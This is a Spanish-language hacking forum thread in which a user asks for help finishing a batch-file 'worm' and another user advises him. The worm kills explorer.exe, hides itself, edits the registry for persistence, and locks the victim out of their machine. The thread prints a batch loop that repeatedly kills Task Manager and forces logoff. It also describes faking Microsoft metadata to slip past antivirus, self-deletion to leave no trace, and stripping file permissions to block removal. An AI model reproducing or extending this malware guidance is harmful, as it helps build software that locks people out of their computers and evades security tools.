Ayuda con mi pequeño worm [??]

Iniciado por Fiiireee, 3 Noviembre 2011, 09:24 AM

0 Miembros y 1 Visitante están viendo este tema.

Fiiireee

Hola fantasmas :)
He estado trabajando en un pequeño worm, procedo a explicar 1 poco lo que hace:
He compilado el código batch con QBFC y he adjuntado un .exe

-mata explorer.exe y otros procesos
-crea un directorio en documents and settings, y se copia y oculta a sí mismo allí.
-varios comandos de edición del registro
-ejecuta el .exe
-se queda haciendo un bucle que mata el proceso taskmgr

todo va perfecto, al copiarse, al editar el registro, la ejecución del exe...
El problema es que el usuario queda totalmente bloqueado, y sólo puede interactuar con el ejecutable adjunto... no hay otra forma de reiniciar mas que a botonazo, y el registro no se guarda y por tanto no se ancla al inicio del sistema, cosa que quiero que haga. Yo habia pensado en que en el momento en que la aplicación se cerrara, el ordenador se reiniciara, de tal forma que al arrancar se volviera a ejecutar toda la secuencia.
Vosotros me direis... sencillo, un simple shutdown. aquí viene el problema. Compilo la aplicación como ya dije con QBFC, y uso la opción "ghost aplication" para que todo se ejecute en background y no salga la ventanita negra, bien, por lo visto el comando shutdown no funciona con "ghost aplication". Lo he probado de ambas formas, con y sin ghost aplication llegando a esa conclusión. tambien he probado a poner otro bat adjunto con parte del código, pero tampoco funciona. tambien he probado a crear otro bat desde el codigo principal y ejecutarlo, pero tampoco funciona, no sé porqué....

ayuda! me gusaria saber como hacer para que al cerrar la aplicación el ordenador se apague/reinicie, o guardar de alguna forma los cambios del registro.

Bueno espero haberme explicado bien, si alguien no entiende algo porfavor preguntadmelo.
Dicen que dos cabezas piensan mejor que una, y si eso es así estoy seguro de que encontraremos la solucion a esto... XD
En realidad sé que es una tontería, pero he buscado mucho por mi cuenta antes de pedir ayuda y no he encontrado nada, por eso recurro a vosotros fantasmitas jejeje.

adrianmendezRap

Solo veo un fallo en tu worm, si no tienes derechos de administrador no puedes hacer nada, eso solo funciona con sistemas con los derechos liberados. El shutdown podrias hacelo de otra forma (http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html), yo uso ese programa para compilar los bat's y funciona el shutdown, tienes la posibilidad de conseguir los derechos de administrador y tambien tiene la posibilidad de borrar la aplicacion de donde se ejecute para no dejar rastro, asi solo quedaria la aplicacion invisible en el pc. Tambien tienes que tener en cuenta que tiene que iniciarse con el modo seguro de windows si no no servira de nada.

Espero que lo termines y recuerda, crea un archivo para desinstalarlo por tu seguridad, ya que si haces un bucle te sera un poco complicado desistalarlo.
No es antiguo... es de coleccionista.

Fiiireee

#2
Gracias por responder adrianmendezRap
Utilizo el QBFC para compilar porque tiene la opción de cambiar la version del archivo, legal trademarks , copyright, etc. si en estos campos pones información falsa (Microsoft) el archivo pasará inadvertido al antivirus.

después de matar procesos, copiarse, editar el registro y lanzar la aplicación he escrito este código: (winmine.exe como ejemplo)

:BUCLE
tasklist /FI "IMAGENAME eq winmine.exe" /FO CSV > search.log

FOR /F %%A IN (search.log) DO IF %%~zA EQU 0 GOTO end

logoff

:end

del search.log
taskkill /f /im taskmgr.exe
GOTO BUCLE


si en algún momento el bucle no encuentra el proceso winmine.exe hara logoff, y los cambios se guardarán. lo ha probado un amigo y por lo visto funciona al 100% jejeje

pero ha surgido otro problemilla... no sé como desinfectarlo, porque el bucle mata el taskmgr.exe cada vez que lo abre, y no hay forma de eliminar el registro que hace que el worm se lanze cada inicio de sesión... ¿se os ocurre algo para desinfectarlo?
habia pensado en un autorun.inf que lanze un cmd.exe, pero esque es una máquina virtual y no detecta USBS XD

y otra cosa mas... como funciona eso de los privilegios en el bat to exe converter?
tiene ese programa la opción de editar el company name, legal trademarks etc?
(me lo miraré de todas formas)

muchas gracias por la ayuda fantasmitas jejeje

EDIT: vale, desinfectarlo ha sido realmente facil... tan facil como entrar en modo seguro y eliminarlo todo xd... alguna proteccion contra esto?
estoy mirando el bat to exe converter... cual es la carpeta que usa como lugar de "descompresion" de archivos añadidos? imagino que con %TEMP% tendría acceso no? gracias de nuevo

adrianmendezRap

Para evitar que no lo puedan borrar tienes que quitar el acceso total de archivo y carpeta y no dejar que ningun usuario sea dueño del archivo. Si me das unos dias te mando el codigo para que no te pase eso, pero una cosa tienes que tener claro, nunca sera imposible borrarlo y desinfectar el sistema, ya que con un cd de linux podrias acceder a el y borrarlo sin problemas y en el siguiente inicio de windows borrar la clave del registro que iniciaba ese programa. Si quieres hacer un buen worm, tiene que integrarse en algun archivo esencial de windows, si no sera un trabajo en vano.
No es antiguo... es de coleccionista.

Fiiireee

Gracias por responderme de nuevo adri ^^
me gustaría mucho que me mandaras ese codigo ^^
hablamos si quieres por privados vale?

TOPIC CLOSED